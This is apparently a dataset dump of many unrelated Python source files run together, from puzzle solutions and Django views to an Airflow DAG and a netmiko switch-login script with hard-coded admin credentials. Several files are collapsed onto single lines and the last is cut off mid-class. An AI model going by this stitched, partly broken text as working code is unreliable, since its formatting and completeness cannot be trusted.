text
stringlengths
38
1.54M
# Day 18, Part 1: Operation Order
import collections


def find_match(expr):
    """Return (open_idx, close_idx) of the first '(' and its matching ')'.

    :param expr: List of single-character tokens.
    :raises ValueError: If the parentheses are unbalanced (the original
        fell off the loop and returned None, causing a TypeError upstream).
    """
    stack = collections.deque()
    idx = expr.index("(")
    for i, tok in enumerate(expr):
        if tok == "(":
            stack.appendleft((i, tok))
        elif tok == ")":
            stack.popleft()
            if not stack:
                return idx, i
    raise ValueError("unbalanced parentheses in expression")


def _apply(left, op, right):
    """Apply one binary operator; only '+' and '*' occur in this puzzle."""
    return left + right if op == "+" else left * right


def evaluate(expr):
    """Evaluate a tokenized expression left-to-right (equal precedence).

    Parenthesized groups are reduced first via recursion; the flat
    remainder is folded three tokens at a time.  Returns the result as a
    string, matching the original contract (callers wrap it in int()).

    BUG FIX: replaced eval() on joined tokens with explicit operator
    dispatch — same results, no code execution of input text.
    """
    if "(" in expr:
        start, end = find_match(expr)
        val = evaluate(expr[start + 1:end])
        return evaluate(expr[:start] + [str(val)] + expr[end + 1:])
    while len(expr) > 1:
        left, op, right = expr[:3]
        expr = [str(_apply(int(left), op, int(right)))] + expr[3:]
    return expr[0]


if __name__ == "__main__":
    with open("inp.txt") as infile:
        INP = infile.read().strip()
    EXPRS = [list(line.replace(" ", "")) for line in INP.split("\n")]
    total = sum(int(evaluate(expr)) for expr in EXPRS)
    print(total)
from __future__ import print_function from netmiko import ConnectHandler import sys import time import select import paramiko import re fd = open(r'C:\Users\J0000049\NewdayTest.txt','w') old_stdout = sys.stdout sys.stdout = fd platform = 'cisco_ios' username = 'admin-j0000049' password = 'xxxxx' ip_add_file = open(r'C:\Users\J0000049\DC Switchevi.txt','r') for host in ip_add_file: device = ConnectHandler(device_type=platform, ip=host, username=username, password=password) output = device.send_command('terminal length 0') output = device.send_command('enable') print('##############################################################\n') print('...................CISCO COMMAND SHOW UPTIME......................\n') output = device.send_command('sh ver | include uptime') print(output) print('...................CISCO COMMAND SHOW IP NAME SERVER...............\n') output = device.send_command('sh ip name-server') print('##############################################################\n') print(output) fd.close()
import py_compile
import sys


def main(argv):
    """Byte-compile the Python file named in argv[1] and print the result.

    :param argv: Argument vector; argv[1] is the source file to compile.
    :return: Path of the generated .pyc file (py_compile.compile's result).

    BUG FIX: the original caught IndexError only to re-raise it verbatim,
    which is a no-op; a missing argument now produces a usage message.
    """
    if len(argv) < 2:
        sys.exit("usage: %s <file.py>" % argv[0])
    result = py_compile.compile(argv[1])
    print(result)
    return result


if __name__ == "__main__":
    main(sys.argv)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os

import streamlit as st

from smart_hr.data import load_data as load
from smart_hr.data.dismissal import load as load_dismissal
from smart_hr.data.activity import load as load_activities


@st.cache
def load_data(data_dir, models_dir):
    """Load all data sources for the app (cached by streamlit).

    Loads, in order: the main HR workbook (hr.xls), the dismissal data
    together with the model's feature importances, and the activities log.

    :param data_dir: Directory containing hr.xls, dismissal.csv, activities.csv.
    :param models_dir: Directory containing feature_importance.csv.

    BUG FIX: the original carried an empty docstring; the loaders are
    presumably caching into module state since nothing is returned —
    TODO confirm against smart_hr.data.
    """
    excel_filename = os.path.join(data_dir, "hr.xls")
    load(excel_filename)

    dismissal_filename = os.path.join(data_dir, "dismissal.csv")
    feature_importance_filename = os.path.join(models_dir, "feature_importance.csv")
    load_dismissal(dismissal_filename, feature_importance_filename)

    activities_filename = os.path.join(data_dir, "activities.csv")
    load_activities(activities_filename)
from django.db import DataError
from drf_standardized_errors.formatter import ExceptionFormatter
from drf_standardized_errors.handler import ExceptionHandler
from drf_standardized_errors.types import ErrorResponse, ErrorType

from metering_billing.exceptions.exceptions import DatabaseOperationFailed


class CustomHandler(ExceptionHandler):
    """Translate low-level database errors into the API's domain exception."""

    def convert_known_exceptions(self, exc: Exception) -> Exception:
        if isinstance(exc, DataError):
            return DatabaseOperationFailed()
        return super().convert_known_exceptions(exc)


class RFC7807Formatter(ExceptionFormatter):
    """Format error responses per RFC 7807 (type / title / detail)."""

    def format_error_response(self, error_response: ErrorResponse):
        error = error_response.errors[0]
        # BUG FIX: url_error_type was unbound (NameError) if a new
        # ErrorType member appeared; fall back to the server-error page.
        if error_response.type == ErrorType.VALIDATION_ERROR:
            url_error_type = "validation-error"
        elif error_response.type == ErrorType.CLIENT_ERROR:
            url_error_type = "client-error"
        else:
            url_error_type = "server-error"
        return_d = {
            "type": f"https://docs.uselotus.io/errors/error-responses#{url_error_type}",
            "detail": error.detail,
            "title": error.code,
        }
        # Validation failures (or multi-error responses) also carry the
        # full per-field error list.
        if (
            len(error_response.errors) > 1
            or error_response.type == ErrorType.VALIDATION_ERROR
        ):
            return_d["validation_errors"] = [
                {"code": x.code, "detail": x.detail, "attr": x.attr}
                for x in error_response.errors
            ]
        return return_d
""" ISCG5421 Practice Test - Semester 2 2020 Kris Pritchard - @krp pytest -v test_contact_tracer.py """ import pytest import contact_tracer def test_that_location_id_is_added_to_visited_set(): brown = contact_tracer.Person('brown@unitec.ac.nz') brown.visit(123) assert 123 in brown.visited def test_that_invalidlocation_is_raised_if_negative_location_id(): brown = contact_tracer.Person('brown@unitec.ac.nz') with pytest.raises(contact_tracer.InvalidLocation): brown.visit(-1) def test_num_visited_locations_is_zero_if_no_visits(): ben = contact_tracer.Person('ben@unitec.ac.nz') num_location_visited = ben.num_locations_visited() assert num_location_visited == 0 def test_num_locations_visited_gt_zero_if_visited_locations(): wipun = contact_tracer.Person('wipun@unitec.ac.nz') wipun.visit(1000) num_locations_visited = wipun.num_locations_visited() assert num_locations_visited == 1 def test_assert_has_contact_returns_true_for_two_people_with_contact(): wipun = contact_tracer.Person('wipun@unitec.ac.nz') ben = contact_tracer.Person('ben@unitec.ac.nz') wipun.visit(500) ben.visit(500) wipun_has_had_contact_with_ben = wipun.has_contact(ben) assert wipun_has_had_contact_with_ben == True def test_assert_has_contact_returns_false_for_two_people_without_contact(): wipun = contact_tracer.Person('wipun@unitec.ac.nz') ben = contact_tracer.Person('ben@unitec.ac.nz') wipun.visit(1000) ben.visit(500) wipun_has_had_contact_with_ben = wipun.has_contact(ben) assert wipun_has_had_contact_with_ben == False def test_notify_returns_all_caps(): wipun = contact_tracer.Person('wipun@unitec.ac.nz') notification = wipun._notify() assert notification == 'WIPUN@UNITEC.AC.NZ'
from marshmallow import *
from ..utils import *

# =====================================================================
# Report


class Report(Schema):
    """Serializer for daily report rows: (day, count)."""

    class Meta:
        dateformat = 'iso'
        fields = ('day', 'count')


class Problems(Schema):
    """Serializer for reported problems and the reporter's contact data."""

    class Meta:
        fields = (
            'branch_indiference',
            'camera_broken',
            'app_broken',
            'qr_lost',
            'names',
            'surnames',
            'email',
            'branch_name',
            'coupon_name',
        )


report_schema = Report(many=True)
report_problems_schema = Problems(many=True)
import heapq


class Huffman(object):
    """A node in a Huffman coding tree; a leaf carries a symbol in `char`."""

    def __init__(self, freq, char=None, left=None, right=None):
        self.char = char
        self.freq = freq
        self.left = left
        self.right = right

    def __repr__(self):
        return "Huffman(char=%s, freq=%s)" % (self.char, self.freq)

    # Needed for node comparison: orders nodes by frequency in the
    # priority queue.
    def __lt__(self, other):
        return self.freq < other.freq

    def isLeaf(self):
        return self.left is None and self.right is None


def maketree(frequencies):
    """Build a Huffman tree from a {symbol: frequency} mapping.

    Returns the root Huffman node, or None for an empty mapping.

    BUG FIX: the original pushed the dict's *keys* (plain strings) onto
    the heap, so `child0.freq` raised AttributeError; we push leaf nodes.
    """
    heap = [Huffman(freq, char=char) for char, freq in frequencies.items()]
    heapq.heapify(heap)
    if not heap:
        return None
    while len(heap) > 1:
        child0 = heapq.heappop(heap)
        child1 = heapq.heappop(heap)
        parent = Huffman(child0.freq + child1.freq, left=child0, right=child1)
        heapq.heappush(heap, parent)
    return heap[0]


def makecodemap(codetree):
    """Return {symbol: bitstring} derived from a Huffman tree (may be None)."""
    codemap = dict()
    if codetree is not None:
        walktree(codetree, codemap, '')
    return codemap


def walktree(codetree, codemap, codeprefix):
    """Recursively fill codemap from Huffman nodes.

    BUG FIX: the original treated the tree as nested tuples and even
    wrote `len(codetree == 1)` — a TypeError; it now walks Huffman nodes.
    """
    if codetree.isLeaf():
        # Degenerate single-symbol alphabet: assign the 1-bit code '0'.
        codemap[codetree.char] = codeprefix or '0'
    else:
        walktree(codetree.left, codemap, codeprefix + "0")
        walktree(codetree.right, codemap, codeprefix + "1")


def encode(message, frequencies):
    """Encode `message` to a bitstring using codes built from `frequencies`.

    BUG FIX: the original *called* the codemap (`codemap(letter)`)
    instead of indexing it.
    """
    codemap = makecodemap(maketree(frequencies))
    return ''.join([codemap[letter] for letter in message])


def decode(encodedmessage, frequencies):
    """Decode a bitstring produced by encode() with the same frequencies.

    BUG FIX: the original appended to an undefined name `decoded` and
    indexed nodes as tuples; it now walks the node tree directly.
    """
    entiretree = maketree(frequencies)
    if entiretree is None:
        return ''
    if entiretree.isLeaf():
        # Single-symbol alphabet: every bit decodes to that symbol.
        return entiretree.char * len(encodedmessage)
    codetree = entiretree
    decodedletters = []
    for digit in encodedmessage:
        codetree = codetree.left if digit == '0' else codetree.right
        if codetree.isLeaf():
            decodedletters.append(codetree.char)
            codetree = entiretree  # restart at the root for the next symbol
    return ''.join(decodedletters)


if __name__ == "__main__":
    # BUG FIX: the demo originally ran `maketree(frequencies)` before
    # `frequencies` was defined, and the sample message contained 'f',
    # a symbol missing from the table; round-trip a valid message instead.
    frequencies = {"a": 7, "b": 2, "c": 1, "d": 1, "e": 2}
    message = "abacdaebaabd"
    encoded = encode(message, frequencies)
    print("encoded", encoded)
    decoded = decode(encoded, frequencies)
    print("decoded", decoded)
#!/usr/bin/env python3
from abc import ABC, abstractmethod
from functools import wraps
from typing import Callable


class Parameter(ABC):
    def __init__(self, i_0: int, c: float, d: float, kappa: int, omega: int, **kwargs):
        """ Every model involves the same mutation model (for now). This involves the parameters
        i_0, c, d, and our bounds [kappa, omega]. Model specific parameters are specified in the
        kwargs argument. Call of base constructor must use keyword arguments.

        :param i_0: Common ancestor repeat length (where to start mutating from).
        :param c: Constant bias for the upward mutation rate.
        :param d: Linear bias for the downward mutation rate.
        :param kappa: Lower bound of repeat lengths.
        :param omega: Upper bound of repeat lengths.
        """
        self.i_0, self.c, self.d, self.kappa, self.omega = i_0, c, d, kappa, omega

        # Set our model specific parameters.
        self.__dict__.update(kwargs)

    def __iter__(self):
        """ Return each of our parameter *values* in the constructor order.

        BUG FIX: iterating self.__dict__ directly yielded the attribute
        *names*, not the parameter values the docstring promised; we now
        yield the values (dict insertion order matches assignment order).

        :return: Iterator for all of our parameters.
        """
        for name in self.__dict__:
            yield self.__dict__[name]

    def __len__(self):
        """ The number of parameters that exist here.

        :return: The number of parameters we have.
        """
        return len(self.__dict__)

    @classmethod
    def from_namespace(cls, arguments, transform: Callable = lambda a: a):
        """ Given a namespace, return a Parameters object with the appropriate parameters.
        Transform each attribute (e.g. add a suffix or prefix) if desired.

        :param arguments: Arguments from some namespace.
        :param transform: Function to transform each attribute, given a string and returning a string.
        :return: New Parameters object with the parsed in arguments.
        """
        from inspect import getfullargspec
        return cls(*list(map(lambda a: getattr(arguments, transform(a)),
                             getfullargspec(cls.__init__).args[1:])))

    @abstractmethod
    def validity(self) -> bool:
        """ Determine if a current parameter set is valid.

        :return: True if valid. False otherwise.
        """
        raise NotImplementedError

    @classmethod
    def walkfunction(cls, func: Callable) -> Callable:
        """ Decorator to apply validity constraints to a given walk function (generating a new
        point given a current point and variables describing its randomness).

        :param func: Walk function.
        :return: Function that will generate new points that are valid.
        """
        @wraps(func)
        def _walkfunction(*args, **kwargs):
            while True:  # Repeat the sample until the parameter set is valid.
                theta_proposed = cls(**func(*args, **kwargs).__dict__)
                if theta_proposed.validity():  # Only return if the parameter set is valid.
                    return theta_proposed
        return _walkfunction
from operator import attrgetter


class PostSort:
    """Sorts a post collection in place by one of eight criteria.

    sort_id selects the criterion ("1".."8"); anything else yields -1.
    """

    def select_sort_method(self, sort_id, post_collection):
        """Dispatch sort_id to the matching sort method; -1 if unknown."""
        dispatch = {
            "1": self.sort_latestPost,
            "2": self.sort_oldestPost,
            "3": self.sort_mostFav,
            "4": self.sort_leastFav,
            "5": self.sort_mostComment,
            "6": self.sort_leastComment,
            "7": self.sort_mostSaves,
            "8": self.sort_leastSaves,
        }
        handler = dispatch.get(sort_id)
        if handler is None:
            return -1
        return handler(post_collection)

    def _sort_by(self, posts, attr, reverse=False):
        """Sort posts in place on `attr` and return the same list."""
        posts.sort(key=attrgetter(attr), reverse=reverse)
        return posts

    def sort_latestPost(self, posts):
        return self._sort_by(posts, 'postTime', reverse=True)

    def sort_oldestPost(self, posts):
        return self._sort_by(posts, 'postTime')

    def sort_mostFav(self, posts):
        return self._sort_by(posts, 'postLikes', reverse=True)

    def sort_leastFav(self, posts):
        return self._sort_by(posts, 'postLikes')

    def sort_mostComment(self, posts):
        return self._sort_by(posts, 'postReplies', reverse=True)

    def sort_leastComment(self, posts):
        return self._sort_by(posts, 'postReplies')

    def sort_mostSaves(self, posts):
        return self._sort_by(posts, 'postSaves', reverse=True)

    def sort_leastSaves(self, posts):
        return self._sort_by(posts, 'postSaves')
import os
import re

import numpy as np

import swr

# Lower the minimum elevation of every ESTIMATED cross-section to -1.0
# and write it back out with a LOWERED name.
# BUG FIX: ported from Python 2 — print statements -> print(), and
# `!= None` -> `is not None`.
est = re.compile('estimated', re.IGNORECASE)
xsec_files = os.listdir('xsec\\')
for xf in xsec_files:
    if est.search(xf) is not None:
        h, xsec = swr.load_xsec('xsec\\' + xf)
        # Header line: point count, x, y, area (taken from the last four fields).
        raw = h[0].split()
        npt, x, y, area = int(raw[-4]), float(raw[-3]), float(raw[-2]), float(raw[-1])
        print(xf, xsec[:, 1].min())
        if xsec[:, 1].min() > -1.0:
            # Clamp the shallowest point(s) down to -1.0.
            xsec[np.where(xsec[:, 1] == xsec[:, 1].min()), 1] = -1.0
            # NOTE(review): the collapsed original is ambiguous about whether
            # the rewrite below sat inside this if-block; writing only the
            # modified sections seems intended — confirm against history.
            h_new = ' {0:10d} {1:10.3e} {2:10.3e} {3:10.3e} '.format(xsec.shape[0], x, y, area)
            name_new = xf.replace('ESTIMATED', 'LOWERED')
            swr.write_profile('xsec\\' + name_new, xsec, h_new)
#!/usr/bin/python
# Project Euler 4: largest palindrome that is a product of two 3-digit numbers.
# BUG FIX: ported from Python 2 — `len(s)/2` is float division and
# `print l` is a syntax error on Python 3.


def palindrome(n):
    """Return a truthy value iff the decimal representation of n is a palindrome.

    (Original returned 0/1; bool is backward compatible — bool is an int.)
    """
    s = str(n)
    return s == s[::-1]


def largest_palindrome_product(lo=100, hi=1000):
    """Return the largest palindromic product a*b with lo <= a, b < hi."""
    return max(a * b
               for a in range(lo, hi)
               for b in range(lo, hi)
               if palindrome(a * b))


if __name__ == "__main__":
    # Guarded so importing this module no longer runs the 810k-iteration search.
    print(largest_palindrome_product())
"""Score held-out feature CSVs with a pickled decision-tree classifier and
report top-3 precision/recall plus per-sample decision paths.

BUG FIXES in this port from Python 2:
  * cPickle -> pickle (cPickle does not exist on Python 3);
  * print statements -> print() calls;
  * filter() results materialised as lists before np.mean (py3 filter is lazy);
  * the pickle file is opened via `with` so it is always closed;
  * single samples are reshaped to 2-D before estimator.predict.
"""
import math
import os.path
import pickle
import random

from sklearn import tree
from sklearn.ensemble import RandomForestClassifier
import numpy as np
import pandas as pd

import input_old

random.seed()

DATA_DIR = 'ml2/data/sp14/op+context+type'

# Load every per-program CSV that has at least one labelled row.
csvs = [f for f in os.listdir(DATA_DIR) if f.endswith('.csv')]
random.shuffle(csvs)

test = []
fs2 = ls2 = None
for csv_name in csvs:
    df2, fs2, ls2 = input_old.load_csv(os.path.join(DATA_DIR, csv_name),
                                       filter_no_labels=True, only_slice=False)
    if df2 is None or df2.shape[0] == 0:
        continue
    test.append(df2)
test = pd.concat(test)

# Feature matrix, labels, and source spans for reporting.
test_samps = test.loc[:, 'F-Is-Eq':]
test_labels = test.loc[:, 'L-DidChange']
test_span = test.loc[:, 'SourceSpan']
feature_names = fs2[1:]

# ------- Loading the previously trained classifier
with open('my_dumped_classifier.pkl', 'rb') as fid:
    estimator = pickle.load(fid)

# ------- Predicting
anses = estimator.predict(test_samps.values)

# Kept from the original exploratory code (unused downstream).
resacc = anses + 2 * test_labels.values
acc = 1 - (sum(abs(anses - test_labels.values)) / 3600)
lol = test_labels.add((-1) * anses)

# Confidence: distance of P(change) from the 0.5 decision boundary.
prob_score = estimator.predict_proba(test_samps.values)
prob_error = [item[1] for item in prob_score]
conf = np.array(prob_error) - 0.5
posconf = [c for c in conf if c > 0]
negconf = [c for c in conf if c < 0]
print(np.mean(posconf))
print(np.mean(negconf))

ll = list(zip(prob_error, anses, test_labels.values, test_span))
score = pd.DataFrame(data=ll, index=test_labels.index,
                     columns=['Error Probability', 'predictions', 'actual', 'SourceSpan'])

# Top-3 accounting: for each program (index label) with >= 3 rows, check
# whether any of the 3 highest-probability predictions is a true positive.
yay1 = yay2 = yay3 = 0
tots = 0
tp = 0
for labelind in list(set(test_labels.index)):
    temp = score.loc[labelind].values
    if len(temp) < 3:
        continue
    tots += 1
    topn = temp[np.argsort(temp[:, 0])]
    a3 = a2 = a1 = 0
    if topn[-3][1] == 1 and topn[-3][2] == 1:
        a3 = 1
        tp += 1
    if topn[-2][1] == 1 and topn[-2][2] == 1:
        a3 = 1
        a2 = 1
        tp += 1
    if topn[-1][1] == 1 and topn[-1][2] == 1:
        a3 = 1
        a2 = 1
        a1 = 1
        tp += 1
    yay1 += a1
    yay2 += a2
    yay3 += a3

print("precision for top 3")
print('top 1')
print(yay1 / tots)
print('top 2')
print(yay2 / tots)
print('top 3')
print(yay3 / tots)
print("recall for top 3")
print(tp / sum(test_labels.values))

# -------------- Tree introspection
X_test = test_samps.values

n_nodes = estimator.tree_.node_count
children_left = estimator.tree_.children_left
children_right = estimator.tree_.children_right
feature = estimator.tree_.feature
threshold = estimator.tree_.threshold

# Decision path per sample, and the leaf each sample ends in.
node_indicator = estimator.decision_path(X_test)
leave_id = estimator.apply(X_test)

# Print the decision rules for every row of program 1655.0.
samp_indsb = test_samps.index.get_loc(1655.0)
samp_inds = [i for i, hit in enumerate(samp_indsb) if hit]
for ind in samp_inds:
    print('our prediction')
    # reshape: sklearn predict expects a 2-D (1, n_features) array.
    print(estimator.predict(X_test[ind].reshape(1, -1)))
    print('should be')
    print(test_labels.values[ind])
    sample_id = ind
    node_index = node_indicator.indices[node_indicator.indptr[sample_id]:
                                        node_indicator.indptr[sample_id + 1]]
    print('Rules used to predict sample %s: ' % sample_id)
    for node_id in node_index:
        if leave_id[sample_id] == node_id:
            print("leaf node {} reached, no decision here".format(leave_id[sample_id]))
        else:
            if X_test[sample_id, feature[node_id]] <= threshold[node_id]:
                threshold_sign = "<="
            else:
                threshold_sign = ">"
            print("decision id node %s : (X[%s, %s] (= %s) %s %s)"
                  % (node_id,
                     sample_id,
                     feature[node_id],
                     X_test[sample_id, feature[node_id]],
                     threshold_sign,
                     threshold[node_id]))
            print(feature_names[feature[node_id]])
    print(test_span.values[ind])
# coding: utf8
from __future__ import absolute_import, unicode_literals


def make_response(info='error', code=1, extra=None):
    """Build a response dict {'code': ..., 'info': ...} merged with extra.

    BUG FIX: the original used a mutable default argument (extra={}),
    so every caller shared — and could mutate — one dict.

    :param info: Human-readable message.
    :param code: Numeric status (1 = error by default).
    :param extra: Optional mapping merged into the response.
    """
    res = {
        'code': code,
        'info': info,
    }
    if extra:
        res.update(extra)
    return res


def success_response(info, extra=None):
    """Shortcut for a code-0 (success) response; delegates to make_response."""
    return make_response(info=info, code=0, extra=extra)


SUCCESS_RESPONSE = make_response(info='SUCCESS', code=0)
# Define variables
my_kitchen = 18.0
your_kitchen = 14.0

# my_kitchen bigger than 10 and smaller than 18?  (chained comparison)
print(10 < my_kitchen < 18)

# my_kitchen smaller than 14 or bigger than 17?
print(my_kitchen < 14 or my_kitchen > 17)

# Double my_kitchen smaller than triple your_kitchen?
print(my_kitchen * 2 < your_kitchen * 3)
# Tony Liang and hari Shanmugaraja
# Feb 9 2020
# read in text file for lidar and text file for car motor and steering and match them up
# sample line
# 1581083570.228828 b'8597 1407\r\n'
#
# output: big list: inside list: 360 (theta, dist) tuples followed by motor, steering

import sys
import random
import subprocess
#import serial
import time
import os
import signal
import pickle


def main(filename=None):
    """Load the two pickled objects from `filename` and print their first items.

    :param filename: Path to the pickle file; defaults to sys.argv[1].
    :return: (inputandoutput, outputonly) as loaded from the file.

    BUG FIX: the original read sys.argv[1] at module import time, so
    merely importing the module without arguments raised IndexError;
    the file is now opened via `with` and argv is read lazily.
    """
    if filename is None:
        filename = sys.argv[1]
    with open(filename, "rb") as infile:
        inputandoutput = pickle.load(infile)
        outputonly = pickle.load(infile)
    print(inputandoutput[0])
    print(outputonly[0])
    return inputandoutput, outputonly


if __name__ == "__main__":
    main()
import base64
import json
import os

from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from gapc_storage.storage import GoogleCloudStorage
from oauth2client.client import SERVICE_ACCOUNT
from oauth2client.service_account import ServiceAccountCredentials


class ECGoogleCloudStorage(GoogleCloudStorage):
    """
    Custom subclass of GoogleCloudStorage to interact with Eldarion Cloud

    To create:

        ec instances env GCS_CREDENTIALS=$(cat key.json | base64) GCS_BUCKET=<bucket>
    """

    path_prefix = settings.MEDIA_PREFIX

    def get_oauth_credentials(self):
        """Build scoped service-account credentials from $GCS_CREDENTIALS."""
        raw = base64.b64decode(os.environ["GCS_CREDENTIALS"])
        client_credentials = json.loads(raw)
        if client_credentials["type"] != SERVICE_ACCOUNT:
            raise ImproperlyConfigured("non-service accounts are not supported")
        creds = ServiceAccountCredentials.from_json_keyfile_dict(client_credentials)
        # NOTE(review): `self.create_scoped(creds)` calls create_scoped on the
        # storage object, not on the credentials — confirm the base class
        # defines it; oauth2client's create_scoped lives on the credentials.
        return self.create_scoped(creds)
#!/usr/bin/env python3
"""Regenerate the Python protobuf modules for the prex package."""
import os
import subprocess
import urllib.request

pb_files = [
    'proto/message.proto',
]

# Output package directory for the generated *_pb2.py modules.
_python_out = '--python_out=' + os.path.join('src', 'prex')

for proto_file in pb_files:
    command = [
        #os.path.join(self.getdir(), 'generator-bin', 'protoc'),
        'protoc',
        '--proto_path=proto',
        _python_out,
        proto_file,
    ]
    subprocess.check_call(command)
import csv

products = [[121, 'ABC123', 'Highlight pen', 231, 0.56],
            [123, 'PQR678', 'Nietmachine', 587, 9.99],
            [128, 'ZYX163', 'Bureaulamp', 34, 19.95],
            [137, 'MLK709', 'Monitorstandaard', 66, 32.50],
            [271, 'TRS665', 'Ipad hoes', 155, 19.01]]

# BUG FIX: mode 'r+' fails if products.csv does not exist yet and leaves
# stale trailing bytes if the old file was longer; 'w' truncates cleanly.
with open('products.csv', 'w', newline='') as csv_file:
    csv_writer = csv.writer(csv_file, delimiter=",")
    csv_writer.writerow(["Product#", "Product-code", "Name", "Stock", "Price"])
    csv_writer.writerows(products)

# Read everything back (note: the csv module yields all fields as strings).
with open("products.csv", "r", newline='') as csv_file:
    lines = list(csv.reader(csv_file, delimiter=","))

# Skip the header row; compute the stats with min/max instead of the
# original 'unset'-sentinel loop (ties keep the first row, like before).
data_rows = lines[1:]
lowest_count_product = min(data_rows, key=lambda row: int(row[3]))
most_expensive_product = max(data_rows, key=lambda row: float(row[4]))
total_products = sum(int(row[3]) for row in data_rows)

print('Het duurste artikel is', most_expensive_product[2], 'en die kost',
      most_expensive_product[4])
print("Er zijn slechts", lowest_count_product[3],
      "exemplaren in voorraad van het product met nummer", lowest_count_product[0])
print('In totaal hebben wij', total_products, 'producten in ons magazijn liggen')
from appliances import DishWasher, Washer, Dryer, Refrigerator, CoffeeMaker, CanOpener, Stove

# Demo: construct one of each appliance and exercise its signature action.
whirlpool_dishwasher = DishWasher("black")
whirlpool_dishwasher.wash_dishes()

samsung_washer = Washer("red", "electric")

samsung_dryer = Dryer("red", "gas")

lg_fridge = Refrigerator("stainless")
lg_fridge.make_ice()

mr_coffee = CoffeeMaker("white")
mr_coffee.make_coffee()

cranky_canopener = CanOpener("black")
cranky_canopener.open_can()

# added the stove for fun
ge_stove = Stove("Stainless Steel")
ge_stove.bake_cookies()
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from __future__ import annotations from datetime import datetime from airflow import models from airflow.models.baseoperator import chain from airflow.providers.amazon.aws.operators.s3 import S3CreateBucketOperator, S3DeleteBucketOperator from airflow.providers.amazon.aws.transfers.ftp_to_s3 import FTPToS3Operator from airflow.utils.trigger_rule import TriggerRule from tests.system.providers.amazon.aws.utils import SystemTestContextBuilder sys_test_context_task = SystemTestContextBuilder().build() DAG_ID = "example_ftp_to_s3" with models.DAG( DAG_ID, schedule="@once", start_date=datetime(2021, 1, 1), catchup=False, tags=["example"], ) as dag: test_context = sys_test_context_task() env_id = test_context["ENV_ID"] s3_bucket = f"{env_id}-ftp-to-s3-bucket" s3_key = f"{env_id}-ftp-to-s3-key" create_s3_bucket = S3CreateBucketOperator(task_id="create_s3_bucket", bucket_name=s3_bucket) # [START howto_transfer_ftp_to_s3] ftp_to_s3_task = FTPToS3Operator( task_id="ftp_to_s3_task", ftp_path="/tmp/ftp_path", s3_bucket=s3_bucket, s3_key=s3_key, replace=True, ) # [END howto_transfer_ftp_to_s3] delete_s3_bucket = S3DeleteBucketOperator( task_id="delete_s3_bucket", bucket_name=s3_bucket, force_delete=True, 
trigger_rule=TriggerRule.ALL_DONE, ) chain( # TEST SETUP test_context, create_s3_bucket, # TEST BODY ftp_to_s3_task, # TEST TEARDOWN delete_s3_bucket, ) from tests.system.utils.watcher import watcher # This test needs watcher in order to properly mark success/failure # when "tearDown" task with trigger rule is part of the DAG list(dag.tasks) >> watcher() from tests.system.utils import get_test_run # noqa: E402 # Needed to run the example DAG with pytest (see: tests/system/README.md#run_via_pytest) test_run = get_test_run(dag)
from django.views.generic import ListView, DetailView, FormView, CreateView, UpdateView
from webapp.models import Article, User, Comment
from webapp.forms import ArticleSearchForm, ArticleForm, CommentForm, UpdateCommentForm
from django.urls import reverse_lazy, reverse
from django.shortcuts import get_object_or_404


class ArticleListView(ListView, FormView):
    """Article index with an optional title/text substring search."""

    template_name = 'index.html'
    model = Article
    form_class = ArticleSearchForm

    def get_queryset(self):
        query = self.request.GET.get('article_name')
        if not query:
            return self.model.objects.all()
        by_title = self.model.objects.filter(title__icontains=query)
        by_text = self.model.objects.filter(text__icontains=query)
        return by_title | by_text


class ArticleDetailView(DetailView):
    template_name = 'article_view.html'
    model = Article


class UserListView(ListView):
    template_name = 'users_view.html'
    model = User


class UserDetailView(DetailView):
    template_name = 'usr_view.html'
    model = User


class ArticleCreateView(CreateView):
    model = Article
    template_name = 'article_create.html'
    form_class = ArticleForm
    success_url = reverse_lazy('index')


class ArticleUpdateView(UpdateView):
    model = Article
    template_name = 'article_update.html'
    form_class = ArticleForm
    success_url = reverse_lazy('index')


class CommentCreateView(CreateView):
    """Create a comment attached to the article given by the URL pk."""

    model = Comment
    template_name = 'comment_create.html'
    form_class = CommentForm

    def get_success_url(self):
        return reverse('article_view', kwargs={'pk': self.object.commented_to.pk})

    def form_valid(self, form):
        # Bind the new comment to its parent article before saving.
        form.instance.commented_to = get_object_or_404(Article, pk=self.kwargs['pk'])
        return super().form_valid(form)


class CommentUpdateView(UpdateView):
    model = Comment
    template_name = 'comment_update.html'
    form_class = UpdateCommentForm

    def get_success_url(self):
        return reverse('article_view', kwargs={'pk': self.object.commented_to.pk})
# -*- coding: utf-8 -*-
import json
from typing import Any, Dict, Mapping

from mock import patch
from u2flib_server.model import DeviceRegistration, RegisteredKey

from eduid_common.api.testing import EduidAPITestCase
from eduid_userdb.credentials import U2F

from eduid_webapp.security.app import SecurityApp, security_init_app

__author__ = 'lundberg'


class SecurityU2FTests(EduidAPITestCase):
    """Tests for the U2F (legacy FIDO U2F) endpoints of the security app.

    Each test drives the Flask test client through the /u2f/* views and
    inspects both the JSON payload returned to the browser and the state
    stashed in the server-side session ('_u2f_enroll_' / '_u2f_challenge_').
    """

    app: SecurityApp

    def load_app(self, config: Mapping[str, Any]) -> SecurityApp:
        """
        Called from the parent class, so we can provide the appropriate flask
        app for this test case.
        """
        return security_init_app('testing', config)

    def update_config(self, config: Dict[str, Any]) -> Dict[str, Any]:
        # Test-only configuration; the u2f_app_id / facets values below are
        # echoed back by the enroll/sign endpoints and asserted on in the tests.
        config.update(
            {
                'available_languages': {'en': 'English', 'sv': 'Svenska'},
                'msg_broker_url': 'amqp://dummy',
                'am_broker_url': 'amqp://dummy',
                'celery_config': {'result_backend': 'amqp', 'task_serializer': 'json'},
                'u2f_app_id': 'https://eduid.se/u2f-app-id.json',
                'u2f_max_allowed_tokens': 2,
                'u2f_max_description_length': 50,
                'fido2_rp_id': 'https://test.example.edu',
                'u2f_valid_facets': ['https://test.example.edu'],
                'vccs_url': 'https://vccs',
                'dashboard_url': 'https://localhost',
            }
        )
        return config

    def add_token_to_user(self, eppn: str):
        """Attach a canned U2F credential to the user and persist it.

        Returns the credential so tests can reference its key.
        """
        user = self.app.central_userdb.get_user_by_eppn(eppn)
        u2f_token = U2F(
            version='version',
